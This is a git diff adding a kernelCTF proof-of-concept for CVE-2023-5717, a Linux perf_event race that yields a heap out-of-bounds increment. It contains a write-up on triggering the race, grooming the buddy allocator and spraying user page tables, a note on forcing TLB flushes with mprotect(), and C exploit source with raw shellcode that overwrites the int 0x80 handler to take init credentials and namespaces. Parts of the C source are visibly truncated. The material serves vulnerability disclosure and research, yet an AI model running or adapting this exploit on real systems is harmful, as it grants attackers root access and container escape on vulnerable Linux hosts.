diff --git a/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/exploit.md new file mode 100644 index 00000000..327912f0 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/exploit.md @@ -0,0 +1,248 @@ +# CVE-2023-6931 + +## Exploit Details + +Exploit demo for CVE-2023-5717. Flag: `kernelCTF{v1:mitigation-v3b-6.1.55:1732857935:6261f8f865bfa74724bdfdf5002d01c644f70ff6}` + +## Overview + +This vulnerability enables an out-of-bounds increment when a race condition is successfully triggered. +On hardened systems, mitigations such as CONFIG_KMALLOC_SPLIT_VARSIZE increase exploitation complexity. +To circumvent these defenses, I manipulated the buddy allocator to achieve controlled linear heap allocation. + +The diagram represents the hierarchy of perf_event groups when a process creates an event group and then forks a child process. +1) Parent group (Inital state) +- At the top, we have a group_leader, which is the leader of the parent event group. +- The group_leader manages multiple sibling events, which are linked together. +``` ++-----------------+ +------------+ +| group_leader |---------| sibling 1 | <--- Siblings connected to group_leader ++-----------------+ +------------+ +``` +2) Child group (After forking) +- When the process forks a child process, the event group is inherited by the child. +- This creates a child event group, which consists of new events mirroring the parent group's structure. +- The child event group also has a new group leader, which is the event corresponding to group_leader in the child process. +``` ++-----------------+ +------------+ +| group_leader |---------| sibling 1 | <--- Siblings connected to group_leader ++-----------------+ +------------+ + | | ++-----------+ +-----------+ +| child 1 |-------------| child 2 | <--- Children connected to each parent & child group leader ++-----------+ +-----------+ +``` + +## Race scenario +### CPU0 +```c +perf_read() + ctx = perf_event_ctx_lock(event); + - perf_read_group() + values = kzalloc(event->read_size, GFP_KERNEL); // [A] + mutex_lock(&leader->child_mutex); // [B] + ret = __perf_read_group_add(leader, read_format, values); + list_for_each_entry(child, &leader->child_list, child_list) { + ret = __perf_read_group_add(child, read_format, values); + } + mutex_unlock(&leader->child_mutex); + perf_event_ctx_unlock(event, ctx); +``` +### CPU1 +```c +perf_release() + ctx = perf_event_ctx_lock(event); + perf_remove_from_context(event, DETACH_GROUP|DETACH_DEAD); // [C] + perf_event_ctx_unlock(event, ctx); // [D] + mutex_lock(&event->child_mutex); // [E] + list_for_each_entry(child, &event->child_list, child_list) { + perf_remove_from_context(child, DETACH_GROUP); + } +``` +### Description +If execution follows the sequence C -> D -> A -> B -> E, the vulnerability is triggered as follows: +1) At C, the parent event is removed from its parent group, decrementing `group_leader->nr_siblings`, which represents the parent group's size. +2) At A, `values` is allocated based on the value of `group_leader->nr_siblings`, which has now been reduced. +3) At B, CPU 0 locks child_mutex, preventing CPU 1 from proceeding beyond E. +4) At E, CPU 1 attempts to iterate through `event->child_list`, but it is blocked because CPU 0 holds the lock at B. +5) Since the parent group's `child_list` is smaller than the child group's `child_list`, this leads to an out-of-bounds access on the heap, causing heap out-of-bounds. + +## Allocating Buffers via the Buddy Allocator +In `perf_read_group()`, the allocated buffer size is determined by the number of active events. +Here is a reliable way to inject new events into an existing group from another process. +The `perf_event_open()` system call enforces a restriction that new events must belong to the same task as the group leader: +```c +SYSCALL_DEFINE5(perf_event_open, + struct perf_event_attr __user *, attr_uptr, + pid_t, pid, int, cpu, int, group_fd, unsigned long, flags) +{ + [...] + if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) { + task = find_lively_task_by_vpid(pid); + if (IS_ERR(task)) { + err = PTR_ERR(task); + goto err_group_fd; + } + } + [...] + event = perf_event_alloc(&attr, cpu, task, group_leader, NULL, + NULL, NULL, cgroup_fd); + [...] + ctx = find_get_context(pmu, task, event); + if (IS_ERR(ctx)) { + err = PTR_ERR(ctx); + goto err_alloc; + } + + /* + * Look up the group leader (we will attach this event to it): + */ + if (group_leader) { + [...] + /* + * Make sure we're both on the same task, or both + * per-CPU events. + */ + if (group_leader->ctx->task != ctx->task) + goto err_context; + [...] + } + [...] +} +``` +The check: +```c +if (group_leader->ctx->task != ctx->task) + goto err_context +``` +ensures that group_leader and the new event belong to the same task. + +The function `perf_event_context_sched_out()` is invoked by the task scheduler during context switches: +```c +static void perf_event_context_sched_out(struct task_struct *task, int ctxn, + struct task_struct *next) +{ + [...] + if (context_equiv(ctx, next_ctx)) { + [...] + WRITE_ONCE(ctx->task, next); + WRITE_ONCE(next_ctx->task, task); + [...] + RCU_INIT_POINTER(task->perf_event_ctxp[ctxn], next_ctx); + RCU_INIT_POINTER(next->perf_event_ctxp[ctxn], ctx); + + do_switch = 0; + + perf_event_sync_stat(ctx, next_ctx); + } + [...] +} +``` +This function swaps ctx between two tasks under the following conditions: + +``` +child task -> parent task (same event group) +parent task -> child task (same event group) +child task -> child task (same event group) +``` + +When we pin a child task to CPU0 and a parent task to CPU1, the ctx will no longer be swapped due to the absence of context switching between the two tasks. + +Initially, we create a child process that allocates 512 events. +Due to `perf_event_context_sched_out()`, the child's ctx is likely to be swapped with the parent's ctx during context switching, making the child inherit the parent's ctx. + +```c +pid = add_siblings_fork(group_leader, 512, 0); +if (pid == 0) { + ret = 1; + goto gg; +} + +pid = add_siblings_fork(group_leader, 511, pid); // first child has the ownership +if (pid == 0) { // context switching failure? + ret = 1; + goto gg; +} +``` +To satisfy the condition `group_leader->ctx->task == ctx->task`, we pass pid 0 (current child process) to `add_siblings_fork()`. +Since the current child process' ctx was swapped with the parent's ctx and `group_leader->ctx` still belongs to the parent, the check is bypassed. +Because the first child process now holds the parent's ctx, we must pass its pid when calling `add_siblings_fork()` again. + +## Arbitrary increment +- Normally, a page fault increments a counter in the current process's ctx. +- However, after swapping(`perf_event_context_sched_out()`), the child's page fault increments counters in the parent's ctx. +- Pinning the parent and child to different CPUs prevents context reswaps, making the attack reliable. + +```c + pid_t child_pid = fork(); + if (child_pid == 0) { // child read, pinned to CPU_A + [...] + char *addr = (char *)mmap(NULL, 0x1000 * 0x80, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + for (int i=0; i<0x80; i++){ + ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0); + addr[0x1000 * i] = 0x41; // trigger page faults + ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0); + } + [...] + remove_xattr("security.x12296_10", 1); // will be used for oob write + for (int _=0; _<32; _++) { + read(group_leader, buf, sizeof(buf)); + } + remove_xattr("security.ssiphim", 1); + if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) { // reclaim the buffer + perror("reclaim failed"); + exit(EXIT_FAILURE); + } + [...] + } + else if (child_pid > 0) { + _pin_to_cpu(CPU_B); // pinned to CPU_B + sched_yield(); + [...] + } +``` + +## Arbitrary physical address Read/Write +To extend the race window, we adapted some code from [kernelCTF writeup](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md). + +1) Spraying User PTEs Near pipe_buffer +- First, we allocate a pipe_buffer and then allocate user pages. +- By repeatedly accessing these user pages, we spray user page table entries (PTEs) close to the pipe_buffer in memory. + +2) Triggering the Vulnerability to Increment `pipe_buffer->page` +- We trigger the vulnerability to increment `pipe_buffer->page`, effectively making it point to the user PTEs. +- If the race condition is successful, we gain control over user PTEs and modify them as needed. + +3) Patching the int 0x80 Handler +- Once we gain arbitrary memory read/write, we search for the int 0x80 handler and overwrite it with our shellcode. +```c + swapgs + mov r12, QWORD PTR gs:0x20cc0 + mov r14, [r12+0x248] + sub r14, 0x1ec030 // r14 = kbase + mov r8, r14 + + mov rdi, 1 + mov rax, r8 + add rax, 0x1bde50 + + push r12 + push r8 + call rax // find_task_by_vpid(1) + mov rbx, rax + pop r8 + pop r12 + + mov rax, r8 + add rax, 0x2a76900 + mov rdi, rax + mov [rbx+2104], rdi // task_struct->ns_proxy = init_nsproxy + mov [r12+2104], rdi // task_struct->ns_proxy = init_nsproxy + + mov rax, r8 + add rax, 0x2a76b40 + mov rdi, rax + mov [r12 + 2008], rdi // task_struct->cred = init_cred + swapgs + iretq +``` \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/novel-techniques.md new file mode 100644 index 00000000..baaf3087 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/novel-techniques.md @@ -0,0 +1,39 @@ +# Fast, Deterministic TLB Flushing for User PTE Exploits via mprotect() +This technique exploits a method to forcibly flush the Translation Lookaside Buffer (TLB) when user PTEs are modified to read or write arbitrary physical addresses. Typically, one might allocate a large chunk of memory to provoke a TLB flush, but in low-memory conditions—where the OOM (Out-Of-Memory) killer might be triggered—this approach becomes infeasible. Our solution is to rapidly toggle page permissions with mprotect(), guaranteeing a TLB flush in a fast and consistent manner, even under memory pressure. + +- Eliminating Large Memory Allocations +Instead of allocating huge memory regions to force a TLB flush (risky under OOM conditions), we rely solely on changing existing page permissions. This approach works even in tight memory scenarios where the OOM killer would otherwise prevent new allocations. + +- Fast and Consistent TLB Synchronization +By toggling permissions (e.g., R -> RWX -> R), we trigger quick, targeted TLB invalidations. This ensures immediate visibility of any changes to physical memory mapped by the user PTE, vastly reducing the time required to search or exploit the memory region. + +## Technique Details +User PTE Modification +We manipulate user-space page table entries (PTEs) to point to arbitrary physical addresses, gaining direct read or write access to privileged memory content. However, these changes aren’t recognized unless the TLB is invalidated. + +The permission flip (mprotect(..., PROT_READ | PROT_WRITE | PROT_EXEC) -> PROT_READ -> back to RWX) forces a TLB flush in all typical Linux environments. +This provides a reliable, universal mechanism to update TLB mappings without depending on unpredictable memory allocation behavior. +Compatible with Low-Memory Scenarios + +```c +for (int j=0; j<16; j++) { + mprotect(&spray_addr[ii][jj], 0x1000, PROT_EXEC | PROT_READ | PROT_WRITE); + if (j%8 == 0) + printf("data%d : %lx %lx\n", j, *(uint64_t *)(&spray_addr[ii][jj]), *(uint64_t *)(&spray_addr[ii][jj+0x9b0])); + + if (*(uint64_t *)(&spray_addr[ii][jj+0x9b0]) == 0xc089f8010fca010fULL) + { + for (int x=0; x +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MIN 60000 +#define MAX 72000 + +#define SIBLINGS_MAX 1024 // about 0x4000 ~ +#define CPU_A 1 // main cpu +#define CPU_B 0 +#define MAX_TRY 4096 +#define TRY_PER_ITER 300 +// TOTAL_ITER = MAX_TRY * TRY_PER_ITER + +char shellcode[] = "\x0f\x01\xf8\x65\x4c\x8b\x24\x25\xc0\x0c\x02\x00\x4d\x8b\xb4\x24\x48\x02\x00\x00\x49\x81\xee\x30\xc0\x1e\x00\x4d\x89\xf0\x48\xc7\xc7\x01\x00\x00\x00\x4c\x89\xc0\x48\x05\x50\xde\x1b\x00\x41\x54\x41\x50\xff\xd0\x48\x89\xc3\x41\x58\x41\x5c\x4c\x89\xc0\x48\x05\x00\x69\xa7\x02\x48\x89\xc7\x48\x89\xbb\x38\x08\x00\x00\x49\x89\xbc\x24\x38\x08\x00\x00\x4c\x89\xc0\x48\x05\x40\x6b\xa7\x02\x48\x89\xc7\x49\x89\xbc\x24\xd8\x07\x00\x00\x0f\x01\xf8\x48\xcf"; +// change nsproxy to initnsproxy & cred to init cred + +int owner_pid; + +#define DEBUG_PRINT() printf("[DEBUG] %d:%s : PID=%d, CPU=%d\n", __LINE__, __func__, getpid(), sched_getcpu()); + +inline static int _pin_to_cpu(int id) +{ + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(id, &set); + return sched_setaffinity(getpid(), sizeof(set), &set); +} + +void busy_wait(long us) { + struct timespec start, current; + + clock_gettime(CLOCK_MONOTONIC, &start); + + do { + clock_gettime(CLOCK_MONOTONIC, ¤t); + } while ((current.tv_sec - start.tv_sec) * 1000000 + (current.tv_nsec - start.tv_nsec) / 1000 < us); +} + +int timefds[0x500000]; +int epfds[0x500000]; +char buf[0x1000]; +int tfd; + +static void epoll_ctl_add(int epfd, int fd, uint32_t events) +{ + struct epoll_event ev; + ev.events = events; + ev.data.fd = fd; + epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev); +} + +void do_epoll_enqueue(int fd) +{ + int cfd[2]; + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); + for (int k = 0; k < 0x10; k++) + { + if (fork() == 0) + { + for (int i = 0; i < 0x300; i++) + { + timefds[i] = dup(fd); + } + for (int i = 0; i < 0x2c0; i++) + { + epfds[i] = epoll_create(0x1); + } + for (int i = 0; i < 0x2c0; i++) + { + for (int j = 0; j < 0x300; j++) + { + // queue as many as possible async waiters at timerfd waitqueue + epoll_ctl_add(epfds[i], timefds[j], 0); + } + } + write(cfd[1], buf, 1); + raise(SIGSTOP); // stop here for nothing and just keep epoll alive + } + // sync to make sure it has queue what we need + read(cfd[0], buf, 1); + } + close(cfd[0]); + close(cfd[1]); +} + +void paused(){ + write(1, "paused\n", 7); + char buf[1]; + read(0, buf, 1); +} + +void remove_xattr(char * name, int idx){ + char fname[0x20]; + sprintf(fname, "/tmp/x%d", idx); + if (setxattr(fname, name, NULL, 0, 0) < 0){ + perror("remove_xattr()"); + exit(0); + } +} + +#define PREFIX "security." + +static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_fd, unsigned long flags) { + return syscall(SYS_perf_event_open, hw_event, pid, cpu, group_fd, flags); +} + +#define MAP_SIZE (512ULL * 512ULL * 0x1000ULL) +#define ALIGN_2MB (512ULL * 0x1000ULL) +char * spray_addr[2]; +int vuln_pipe[2]; +void bootstrap() { + char * addr; + char buf[0x100] = {0xcc, }; + uint64_t current_brk = (uint64_t)sbrk(0); + uint64_t aligned_addr = (current_brk / ALIGN_2MB) * ALIGN_2MB; + addr = mmap((void *)(aligned_addr + ALIGN_2MB), MAP_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); + mlock(addr, MAP_SIZE); + for (size_t i = 0; i < MAP_SIZE; i += 0x1000 * 512) + addr[i] = 0x41; + for (size_t i = 0; i < MAP_SIZE; i += 0x1000) + addr[i] = 0x41; + spray_addr[0] = addr; + if (pipe(vuln_pipe) < 0) { + perror("pipe"); + return; + } + + write(vuln_pipe[1], buf, sizeof(buf)); + addr = mmap((void *)aligned_addr + ALIGN_2MB + MAP_SIZE, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); + mlock(addr, MAP_SIZE); + for (size_t i = 0; i < MAP_SIZE; i += 0x1000 * 512) + addr[i] = 0x41; + for (size_t i = 0; i < MAP_SIZE; i += 0x1000) + addr[i] = 0x41; + spray_addr[1] = addr; +} + +void set_max_fd_limit() { + struct rlimit rl; + if (getrlimit(RLIMIT_NOFILE, &rl) == -1) { + perror("getrlimit failed"); + exit(EXIT_FAILURE); + } + rl.rlim_cur = rl.rlim_max; + if (setrlimit(RLIMIT_NOFILE, &rl) == -1) { + perror("setrlimit failed"); + exit(EXIT_FAILURE); + } + printf("[+] changed fd limit: %ld\n", rl.rlim_cur); +} + +#define MAX_FORK_CNT 50 +int siblings_fork_pid[MAX_FORK_CNT]; +int siblings_fork_cnt; +int siblings[SIBLINGS_MAX]; +int siblings_cnt; +static atomic_int race_go = 0; // child process will use it +static atomic_int race_tf = 0; + +void print_buddyinfo(void) { + int cnt=0; + char buf[1024]; + int fd = open("/proc/buddyinfo", O_RDONLY); + int n = read(fd, buf, sizeof(buf)-1); + if(n > 0) { + for (int i=0; ivalue = (char *)calloc(0x10000, 1); + if((ret->size = getxattr(fname, name, ret->value, 0x10000)) < 0) + puts("getxattr error"); + for (int i=0; i<0x10000; i+=0x1000) + ret->value[i] = 0x41; + free(ret->value); + return ret; +} + +void spray_xattr_page(int size, int cnt, int idx){ + char value[0x4000] = {0, }; + char fname[0x20]; + sprintf(fname, "/tmp/x%d", idx); + close(open(fname, O_CREAT | O_RDWR, 0777)); + for(int i = 0; i <= cnt; i++){ + char z[0x24] = {0, }; + sprintf(z,"x%d_%d", size, i); + char *name = (char *)calloc(strlen(PREFIX) + strlen(z) + 1, 1); + memset(value, i%0x100, size); + strcpy(name, PREFIX); + strcat(name, z); + int ret = setxattr(fname, name, value, size, 0); + if (ret < 0){ + perror("setxattr"); + exit(EXIT_FAILURE); + } + } +} + +void resize_pipe(int fd, uint64_t sz){ + if(fcntl(fd, F_SETPIPE_SZ, sz) < 0) + perror("pipe resize"); +} + +void race_gogo(int signo) { // signal handler + atomic_store(&race_go, 1); +} + +void race_notify(int signo) { + atomic_store(&race_tf, 1); +} + +void race_oracle(){ + struct sigaction sa; + sa.sa_handler = race_notify; + sigemptyset(&sa.sa_mask); + sa.sa_flags = 0; + if (sigaction(SIGUSR1, &sa, NULL) < 0) { + perror("sigaction"); + exit(EXIT_FAILURE); + } +} + +void print_proc_self_maps_raw() { + int fd = open("/proc/self/maps", O_RDONLY); + if (fd < 0) { + write(STDERR_FILENO, "Error: Unable to open /proc/self/maps\n", 38); + _exit(EXIT_FAILURE); + } + + char buffer[256]; + ssize_t bytes_read; + + while ((bytes_read = read(fd, buffer, sizeof(buffer))) > 0) { + write(STDOUT_FILENO, buffer, bytes_read); + } + + if (bytes_read < 0) { + write(STDERR_FILENO, "Error: Unable to read /proc/self/maps\n", 38); + _exit(EXIT_FAILURE); + } + + close(fd); +} + +int counter_init = 0; +void race(int group_leader) { // caller must have ownership of the group + int pipefd[2]; + uint64_t buf[0x2000] = {0, }; + char buffer[0x100] = {0x41, }; + if (pipe(pipefd) < 0){ + perror("race - pipe"); + exit(EXIT_FAILURE); + } + int ppid = getppid(); + int status; + + pid_t child_pid = fork(); + if (child_pid == 0) { // child read + _pin_to_cpu(CPU_A); + sched_yield(); + // DEBUG_PRINT(); + raise(SIGSTOP); // stop - keep same generation + for (int i=0; i<512+511; i++){ + ioctl(siblings[i], PERF_EVENT_IOC_RESET, PERF_IOC_FLAG_GROUP); + ioctl(siblings[i], PERF_EVENT_IOC_ENABLE, 0); + } + if (close(siblings[100]) < 0) { + perror("close failed"); + exit(EXIT_FAILURE); + } + char * addr; + if (!counter_init) { // preserving previously recorded counters. + puts("[+] Initializing Counters"); + addr = (char *)mmap(NULL, 0x1000 * 0x80, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + for (int i=0; i<0x80; i++){ + ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0); + addr[0x1000 * i] = 0x41; + ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0); + } + } + + write(pipefd[1], buffer, 1); // sync point A + remove_xattr("security.x12296_10", 1); + // x10 reclaimed by CPU_B is now released on CPU_A + for (int _=0; _<32; _++); + read(group_leader, buf, sizeof(buf)); + remove_xattr("security.ssiphim", 1); + if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) { + perror("reclaim failed"); + exit(EXIT_FAILURE); + } + if (setxattr("/tmp/x1", "security.ssiphim", buf, 0x3008, 0) < 0) { + perror("reclaim failed"); + exit(EXIT_FAILURE); + } + uint64_t ptes[512]; + for (int p=0; p<512; p++) + ptes[p] = 0x8000000000000067; + + write(vuln_pipe[1], ptes, sizeof(ptes)); + read(vuln_pipe[0], ptes, sizeof(ptes)); + if (!counter_init) { + munmap(addr, 0x1000 * 0x80); + } + exit(0); + } + else if (child_pid > 0) { // parent + // DEBUG_PRINT(); + struct perf_event_attr pe; + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_SOFTWARE; + pe.size = sizeof(pe); + pe.config = PERF_COUNT_SW_PAGE_FAULTS; + pe.disabled = 0; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.inherit = 1; + pe.pinned = 0; + + int tmp = perf_event_open(&pe, 0, CPU_A, -1, 0); + close(tmp); // generation++ and ctx will be pinned. + usleep(20000); + kill(child_pid, SIGCONT); // continue + + read(pipefd[0], buffer, 1); // sync point A + int r = MIN + rand() % (MAX - MIN + 1); + printf("[*] r = %d\n", r); + // int r = timer; + struct itimerspec new = {.it_value.tv_nsec = r}; // 95674 + timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL); + close(siblings[100]); + + tmp = perf_event_open(&pe, owner_pid, CPU_A, group_leader, 0); + if (tmp < 0) { + perror("Adding failed"); + exit(1); + } + siblings[100] = tmp; + } else { + perror("fork failed"); + exit(EXIT_FAILURE); + } + // DEBUGDEBUG - not + waitpid(child_pid, &status, 0); + if (!counter_init) + counter_init = 1; + + close(pipefd[0]); + close(pipefd[1]); + atomic_store(&race_go, 0); // \(*_*)/ + kill(ppid, SIGUSR1); +} + +pid_t add_siblings_fork(int group_leader, int cnt, int ctx_pid, int is_racer){ + if (siblings_fork_cnt >= MAX_FORK_CNT){ + puts("[-] nope"); + exit(EXIT_FAILURE); + } + char buffer[1] = {0}; + int pipe_fd[2]; + if (pipe(pipe_fd) < 0) { + perror("add_siblings_fork - pipe"); + exit(EXIT_FAILURE); + } + struct perf_event_attr pe; + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_SOFTWARE; + pe.size = sizeof(pe); + pe.config = PERF_COUNT_SW_PAGE_FAULTS; + pe.disabled = 0; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.inherit = 1; // parent.attr.inherit == child.attr.inherit + pe.pinned = 0; // child can not be pinned - group leader only + + sched_yield(); + pid_t child_pid = fork(); + if(child_pid == 0) { + // child & parent must be on the same cpu (validation event->cpu) + // This child process must have ownership of the group + int tmp = perf_event_open(&pe, 0, CPU_A, -1, 0); + close(tmp); // generation++ and ctx will be pinned. + + owner_pid = getpid(); + printf("owner : %d\n", owner_pid); + + for(int i=0; i 0x80000000e0000000) + break; + for (int p=0; p<512; p++) + ptes[p] = pte; + write(vuln_pipe[1], ptes, sizeof(ptes)); + read(vuln_pipe[0], ptes, sizeof(ptes)); + + for (int j=0; j<1; j++) { + mprotect(&spray_addr[ii][jj], 0x1000, PROT_EXEC | PROT_READ | PROT_WRITE); + if (j%8 == 0) + printf("data%d : %lx %lx\n", j, *(uint64_t *)(&spray_addr[ii][jj]), *(uint64_t *)(&spray_addr[ii][jj+0x9b0])); + + if (*(uint64_t *)(&spray_addr[ii][jj+0x9b0]) == 0xc089f8010fca010fULL) + { + for (int x=0; x 0) { + for (int it=0; it